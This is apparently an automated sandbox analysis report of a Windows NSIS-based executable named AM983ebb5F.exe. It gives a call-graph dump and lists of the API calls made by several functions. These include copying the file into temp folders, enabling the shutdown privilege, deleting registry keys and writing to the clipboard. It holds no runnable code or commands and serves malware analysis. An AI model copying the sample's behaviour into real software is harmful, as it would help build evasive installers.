40381c 3264 403820 GetWindowsDirectoryW lstrcatW 3263->3264 3265 403876 DeleteFileW 3263->3265 3268 403501 12 API calls 3264->3268 3339 403082 GetTickCount GetModuleFileNameW 3265->3339 3266 405e53 CharNextW 3266->3267 3267->3260 3267->3266 3273 4037f2 3267->3273 3270 40383c 3268->3270 3270->3265 3272 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3270->3272 3271 40388a 3274 403941 3271->3274 3277 403931 3271->3277 3281 405e53 CharNextW 3271->3281 3275 403501 12 API calls 3272->3275 3423 406557 lstrcpynW 3273->3423 3428 403b4f 3274->3428 3279 40386e 3275->3279 3367 403c29 3277->3367 3279->3265 3279->3274 3294 4038a9 3281->3294 3283 403ab3 3285 403b37 ExitProcess 3283->3285 3286 403abb GetCurrentProcess OpenProcessToken 3283->3286 3284 403a8f 3435 405bb7 3284->3435 3288 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3286->3288 3289 403b07 3286->3289 3288->3289 3296 40694b 5 API calls 3289->3296 3290 403907 3297 405f2e 18 API calls 3290->3297 3291 40394a 3295 405b22 5 API calls 3291->3295 3294->3290 3294->3291 3298 40394f lstrlenW 3295->3298 3299 403b0e 3296->3299 3300 403913 3297->3300 3426 406557 lstrcpynW 3298->3426 3302 403b23 ExitWindowsEx 3299->3302 3304 403b30 3299->3304 3300->3274 3424 406557 lstrcpynW 3300->3424 3302->3285 3302->3304 3303 403969 3306 403981 3303->3306 3427 406557 lstrcpynW 3303->3427 3439 40140b 3304->3439 3311 4039a7 wsprintfW 3306->3311 3324 4039d3 3306->3324 3308 403926 3425 406557 lstrcpynW 3308->3425 3312 406594 21 API calls 3311->3312 3312->3306 3313 405b05 2 API calls 3313->3324 3314 405aab 2 API calls 3314->3324 3315 4039e3 GetFileAttributesW 3317 4039ef DeleteFileW 3315->3317 3315->3324 3316 403a1d SetCurrentDirectoryW 3318 406317 40 API calls 3316->3318 3317->3324 3319 403a2c CopyFileW 3318->3319 3319->3274 3319->3324 3320 405c63 71 API calls 3320->3324 3321 406317 40 API calls 3321->3324 3322 406594 21 API calls 3322->3324 3323 405b3a 2 API calls 3323->3324 3324->3274 3324->3306 3324->3311 3324->3313 3324->3314 3324->3315 3324->3316 3324->3320 3324->3321 3324->3322 3324->3323 3325 403aa5 CloseHandle 3324->3325 3326 4068b4 2 API calls 3324->3326 3325->3274 3326->3324 3327->3254 3328->3257 3330 406805 5 API calls 3329->3330 3332 40350d 3330->3332 3331 403517 3331->3263 3332->3331 3333 405e26 3 API calls 3332->3333 3334 40351f 3333->3334 3335 405b05 2 API calls 3334->3335 3336 403525 3335->3336 3337 406076 2 API calls 3336->3337 3338 403530 3337->3338 3338->3263 3442 406047 GetFileAttributesW CreateFileW 3339->3442 3341 4030c2 3362 4030d2 3341->3362 3443 406557 lstrcpynW 3341->3443 3343 4030e8 3344 405e72 2 API calls 3343->3344 3345 4030ee 3344->3345 3444 406557 lstrcpynW 3345->3444 3347 4030f9 GetFileSize 3348 4031f3 3347->3348 3352 403110 3347->3352 3445 40301e 3348->3445 3350 4031fc 3353 40322c GlobalAlloc 3350->3353 3350->3362 3480 4034ea SetFilePointer 3350->3480 3352->3348 3354 40325f 3352->3354 3352->3362 3364 40301e 6 API calls 3352->3364 3477 4034d4 3352->3477 3456 4034ea SetFilePointer 3353->3456 3359 40301e 6 API calls 3354->3359 3357 403215 3360 4034d4 ReadFile 3357->3360 3358 403247 3457 4032b9 3358->3457 3359->3362 3363 403220 3360->3363 3362->3271 3363->3353 3363->3362 3364->3352 3366 403290 SetFilePointer 3366->3362 3368 40694b 5 API calls 3367->3368 3369 403c3d 3368->3369 3370 403c43 3369->3370 3371 403c55 3369->3371 3497 40649e wsprintfW 3370->3497 3372 406425 3 API calls 3371->3372 3373 403c85 3372->3373 3374 403ca4 lstrcatW 3373->3374 3377 406425 3 API calls 3373->3377 3376 403c53 3374->3376 3482 403eff 3376->3482 3377->3374 3380 405f2e 18 API calls 3381 403cd6 3380->3381 3382 403d6a 3381->3382 3385 406425 3 API calls 3381->3385 3383 405f2e 18 API calls 3382->3383 3384 403d70 3383->3384 3386 403d80 LoadImageW 3384->3386 3388 406594 21 API calls 3384->3388 3387 403d08 3385->3387 3389 403e26 3386->3389 3390 403da7 RegisterClassW 3386->3390 3387->3382 3391 403d29 lstrlenW 3387->3391 3394 405e53 CharNextW 3387->3394 3388->3386 3393 40140b 2 API calls 3389->3393 3392 403ddd SystemParametersInfoW CreateWindowExW 3390->3392 3422 403e30 3390->3422 3395 403d37 lstrcmpiW 3391->3395 3396 403d5d 3391->3396 3392->3389 3397 403e2c 3393->3397 3398 403d26 3394->3398 3395->3396 3399 403d47 GetFileAttributesW 3395->3399 3400 405e26 3 API calls 3396->3400 3402 403eff 22 API calls 3397->3402 3397->3422 3398->3391 3401 403d53 3399->3401 3403 403d63 3400->3403 3401->3396 3404 405e72 2 API calls 3401->3404 3405 403e3d 3402->3405 3498 406557 lstrcpynW 3403->3498 3404->3396 3407 403e49 ShowWindow 3405->3407 3408 403ecc 3405->3408 3410 4068db 3 API calls 3407->3410 3490 4056af OleInitialize 3408->3490 3412 403e61 3410->3412 3411 403ed2 3414 403ed6 3411->3414 3415 403eee 3411->3415 3413 403e6f GetClassInfoW 3412->3413 3416 4068db 3 API calls 3412->3416 3418 403e83 GetClassInfoW RegisterClassW 3413->3418 3419 403e99 DialogBoxParamW 3413->3419 3421 40140b 2 API calls 3414->3421 3414->3422 3417 40140b 2 API calls 3415->3417 3416->3413 3417->3422 3418->3419 3420 40140b 2 API calls 3419->3420 3420->3422 3421->3422 3422->3274 3423->3261 3424->3308 3425->3277 3426->3303 3427->3306 3429 403b67 3428->3429 3430 403b59 CloseHandle 3428->3430 3510 403b94 3429->3510 3430->3429 3433 405c63 71 API calls 3434 403a82 OleUninitialize 3433->3434 3434->3283 3434->3284 3436 405bcc 3435->3436 3437 403a9d ExitProcess 3436->3437 3438 405be0 MessageBoxIndirectW 3436->3438 3438->3437 3440 401389 2 API calls 3439->3440 3441 401420 3440->3441 3441->3285 3442->3341 3443->3343 3444->3347 3446 403027 3445->3446 3447 40303f 3445->3447 3448 403030 DestroyWindow 3446->3448 3449 403037 3446->3449 3450 403047 3447->3450 3451 40304f GetTickCount 3447->3451 3448->3449 3449->3350 3454 406987 2 API calls 3450->3454 3452 403080 3451->3452 3453 40305d CreateDialogParamW ShowWindow 3451->3453 3452->3350 3453->3452 3455 40304d 3454->3455 3455->3350 3456->3358 3459 4032d2 3457->3459 3458 403300 3461 4034d4 ReadFile 3458->3461 3459->3458 3481 4034ea SetFilePointer 3459->3481 3462 40330b 3461->3462 3463 40346d 3462->3463 3464 40331d GetTickCount 3462->3464 3466 403253 3462->3466 3465 4034af 3463->3465 3470 403471 3463->3470 3464->3466 3473 40336c 3464->3473 3468 4034d4 ReadFile 3465->3468 3466->3362 3466->3366 3467 4034d4 ReadFile 3467->3473 3468->3466 3469 4034d4 ReadFile 3469->3470 3470->3466 3470->3469 3471 4060f9 WriteFile 3470->3471 3471->3470 3472 4033c2 GetTickCount 3472->3473 3473->3466 3473->3467 3473->3472 3474 4033e7 MulDiv wsprintfW 3473->3474 3476 4060f9 WriteFile 3473->3476 3475 4055dc 28 API calls 3474->3475 3475->3473 3476->3473 3478 4060ca ReadFile 3477->3478 3479 4034e7 3478->3479 3479->3352 3480->3357 3481->3458 3483 403f13 3482->3483 3499 40649e wsprintfW 3483->3499 3485 403f84 3500 403fb8 3485->3500 3487 403cb4 3487->3380 3488 403f89 3488->3487 3489 406594 21 API calls 3488->3489 3489->3488 3503 404522 3490->3503 3492 4056f9 3493 404522 SendMessageW 3492->3493 3495 40570b CoUninitialize 3493->3495 3494 4056d2 3494->3492 3506 401389 3494->3506 3495->3411 3497->3376 3498->3382 3499->3485 3501 406594 21 API calls 3500->3501 3502 403fc6 SetWindowTextW 3501->3502 3502->3488 3504 40453a 3503->3504 3505 40452b SendMessageW 3503->3505 3504->3494 3505->3504 3508 401390 3506->3508 3507 4013fe 3507->3494 3508->3507 3509 4013cb MulDiv SendMessageW 3508->3509 3509->3508 3511 403ba2 3510->3511 3512 403b6c 3511->3512 3513 403ba7 FreeLibrary GlobalFree 3511->3513 3512->3433 3513->3512 3513->3513 4407 401a35 4408 402dab 21 API calls 4407->4408 4409 401a3e ExpandEnvironmentStringsW 4408->4409 4410 401a52 4409->4410 4412 401a65 4409->4412 4411 401a57 lstrcmpW 4410->4411 4410->4412 4411->4412 4418 4023b7 4419 4023bf 4418->4419 4422 4023c5 4418->4422 4420 402dab 21 API calls 4419->4420 4420->4422 4421 4023d3 4424 4023e1 4421->4424 4425 402dab 21 API calls 4421->4425 4422->4421 4423 402dab 21 API calls 4422->4423 4423->4421 4426 402dab 21 API calls 4424->4426 4425->4424 4427 4023ea WritePrivateProfileStringW 4426->4427 4428 4014b8 4429 4014be 4428->4429 4430 401389 2 API calls 4429->4430 4431 4014c6 4430->4431 4432 402439 4433 402441 4432->4433 4434 40246c 4432->4434 4435 402deb 21 API calls 4433->4435 4436 402dab 21 API calls 4434->4436 4437 402448 4435->4437 4438 402473 4436->4438 4440 402dab 21 API calls 4437->4440 4441 402480 4437->4441 4443 402e69 4438->4443 4442 402459 RegDeleteValueW RegCloseKey 4440->4442 4442->4441 4444 402e76 4443->4444 4445 402e7d 4443->4445 4444->4441 4445->4444 4447 402eae 4445->4447 4448 4063c4 RegOpenKeyExW 4447->4448 4449 402edc 4448->4449 4450 402eec RegEnumValueW 4449->4450 4455 402f0f 4449->4455 4458 402f86 4449->4458 4451 402f76 RegCloseKey 4450->4451 4450->4455 4451->4458 4452 402f4b RegEnumKeyW 4453 402f54 RegCloseKey 4452->4453 4452->4455 4454 40694b 5 API calls 4453->4454 4456 402f64 4454->4456 4455->4451 4455->4452 4455->4453 4457 402eae 6 API calls 4455->4457 4456->4458 4459 402f68 RegDeleteKeyW 4456->4459 4457->4455 4458->4444 4459->4458 4460 40173a 4461 402dab 21 API calls 4460->4461 4462 401741 SearchPathW 4461->4462 4463 40175c 4462->4463 4464 401d3d 4465 402d89 21 API calls 4464->4465 4466 401d44 4465->4466 4467 402d89 21 API calls 4466->4467 4468 401d50 GetDlgItem 4467->4468 4469 40263d 4468->4469 4469->4469

                                                                                    Executed Functions

                                                                                    Function 00403532 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464stringfilecomCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 403532-403584 SetErrorMode GetVersionExW 1 403586-4035b6 GetVersionExW 0->1 2 4035be-4035c3 0->2 1->2 3 4035c5 2->3 4 4035cb-40360d 2->4 3->4 5 403620 4->5 6 40360f-403617 call 40694b 4->6 7 403625-403639 call 4068db lstrlenA 5->7 6->5 12 403619 6->12 13 40363b-403657 call 40694b * 3 7->13 12->5 20 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 13->20 21 403659-40365f 13->21 28 4036d5-4036e9 call 405e53 CharNextW 20->28 29 4036ce-4036d0 20->29 21->20 26 403661 21->26 26->20 32 4037e4-4037ea 28->32 29->28 33 4037f0 32->33 34 4036ee-4036f4 32->34 37 403804-40381e GetTempPathW call 403501 33->37 35 4036f6-4036fb 34->35 36 4036fd-403704 34->36 35->35 35->36 39 403706-40370b 36->39 40 40370c-403710 36->40 44 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 37->44 45 403876-403890 DeleteFileW call 403082 37->45 39->40 42 4037d1-4037e0 call 405e53 40->42 43 403716-40371c 40->43 42->32 61 4037e2-4037e3 42->61 47 403736-40376f 43->47 48 40371e-403725 43->48 44->45 64 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 44->64 66 403896-40389c 45->66 67 403a7d-403a8d call 403b4f OleUninitialize 45->67 49 403771-403776 47->49 50 40378c-4037c6 47->50 54 403727-40372a 48->54 55 40372c 48->55 49->50 56 403778-403780 49->56 58 4037c8-4037cc 50->58 59 4037ce-4037d0 50->59 54->47 54->55 55->47 62 403782-403785 56->62 63 403787 56->63 58->59 65 4037f2-4037ff call 406557 58->65 59->42 61->32 62->50 62->63 63->50 64->45 64->67 65->37 70 4038a2-4038ad call 405e53 66->70 71 403935-40393c call 403c29 66->71 78 403ab3-403ab9 67->78 79 403a8f-403a9f call 405bb7 ExitProcess 67->79 81 4038fb-403905 70->81 82 4038af-4038e4 70->82 77 403941-403945 71->77 77->67 83 403b37-403b3f 78->83 84 403abb-403ad1 GetCurrentProcess OpenProcessToken 78->84 89 403907-403915 call 405f2e 81->89 90 40394a-403970 call 405b22 lstrlenW call 406557 81->90 86 4038e6-4038ea 82->86 91 403b41 83->91 92 403b45-403b49 ExitProcess 83->92 87 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 84->87 88 403b07-403b15 call 40694b 84->88 94 4038f3-4038f7 86->94 95 4038ec-4038f1 86->95 87->88 104 403b23-403b2e ExitWindowsEx 88->104 105 403b17-403b21 88->105 89->67 106 40391b-403931 call 406557 * 2 89->106 110 403981-403999 90->110 111 403972-40397c call 406557 90->111 91->92 94->86 99 4038f9 94->99 95->94 95->99 99->81 104->83 108 403b30-403b32 call 40140b 104->108 105->104 105->108 106->71 108->83 116 40399e-4039a2 110->116 111->110 118 4039a7-4039d1 wsprintfW call 406594 116->118 122 4039d3-4039d8 call 405aab 118->122 123 4039da call 405b05 118->123 126 4039df-4039e1 122->126 123->126 128 4039e3-4039ed GetFileAttributesW 126->128 129 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 126->129 130 403a0e-403a19 128->130 131 4039ef-4039f8 DeleteFileW 128->131 137 403a7b 129->137 138 403a3e-403a5f call 406317 call 406594 call 405b3a 129->138 130->116 134 403a1b 130->134 131->130 133 4039fa-403a0c call 405c63 131->133 133->118 133->130 134->67 137->67 146 403a61-403a6b 138->146 147 403aa5-403ab1 CloseHandle 138->147 146->137 148 403a6d-403a75 call 4068b4 146->148 147->137 148->118 148->137
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE ref: 00403555
                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                    • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                    • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                    • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\AM983ebb5F.exe",00000020,"C:\Users\user\Desktop\AM983ebb5F.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                    • wsprintfW.USER32 ref: 004039B1
                                                                                    • GetFileAttributesW.KERNEL32( abelsa",C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                                                    • DeleteFileW.KERNEL32( abelsa"), ref: 004039F0
                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                      • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\AM983ebb5F.exe, abelsa",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, abelsa",?), ref: 00405B63
                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, abelsa",?), ref: 00405B70
                                                                                      • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                      • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                    • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                    • CloseHandle.KERNEL32(00000000,00438000,00438000,?, abelsa",00000000), ref: 00403AA6
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                    • ExitProcess.KERNEL32 ref: 00403B49
                                                                                      • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                    • String ID: abelsa"$"C:\Users\user\Desktop\AM983ebb5F.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\Desktop$C:\Users\user\Desktop\AM983ebb5F.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                    • API String ID: 1813718867-1857143593
                                                                                    • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                                                    • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                    • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                                                    • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E
                                                                                    Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 151 40571b-405736 152 4058c5-4058cc 151->152 153 40573c-405803 GetDlgItem * 3 call 40450b call 404e64 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 4058f6-405903 152->155 156 4058ce-4058f0 GetDlgItem CreateThread CloseHandle 152->156 175 405821-405824 153->175 176 405805-40581f SendMessageW * 2 153->176 158 405921-40592b 155->158 159 405905-40590b 155->159 156->155 160 405981-405985 158->160 161 40592d-405933 158->161 163 405946-40594f call 40453d 159->163 164 40590d-40591c ShowWindow * 2 call 40450b 159->164 160->163 170 405987-40598d 160->170 166 405935-405941 call 4044af 161->166 167 40595b-40596b ShowWindow 161->167 172 405954-405958 163->172 164->158 166->163 173 40597b-40597c call 4044af 167->173 174 40596d-405976 call 4055dc 167->174 170->163 177 40598f-4059a2 SendMessageW 170->177 173->160 174->173 178 405834-40584b call 4044d6 175->178 179 405826-405832 SendMessageW 175->179 176->175 180 405aa4-405aa6 177->180 181 4059a8-4059d3 CreatePopupMenu call 406594 AppendMenuW 177->181 190 405881-4058a2 GetDlgItem SendMessageW 178->190 191 40584d-405861 ShowWindow 178->191 179->178 180->172 188 4059d5-4059e5 GetWindowRect 181->188 189 4059e8-4059fd TrackPopupMenu 181->189 188->189 189->180 192 405a03-405a1a 189->192 190->180 195 4058a8-4058c0 SendMessageW * 2 190->195 193 405870 191->193 194 405863-40586e ShowWindow 191->194 196 405a1f-405a3a SendMessageW 192->196 197 405876-40587c call 40450b 193->197 194->197 195->180 196->196 198 405a3c-405a5f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->190 200 405a61-405a88 SendMessageW 198->200 200->200 201 405a8a-405a9e GlobalUnlock SetClipboardData CloseClipboard 200->201 201->180
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                    • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                                                                    • ShowWindow.USER32(00000000), ref: 00405914
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                    • ShowWindow.USER32(00000008), ref: 00405963
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                    • CreatePopupMenu.USER32 ref: 004059A8
                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                    • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                    • EmptyClipboard.USER32 ref: 00405A43
                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                    • CloseClipboard.USER32 ref: 00405A9E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID: {
                                                                                    • API String ID: 590372296-366298937
                                                                                    • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                    • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                                                    • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                    • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                                                                    Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
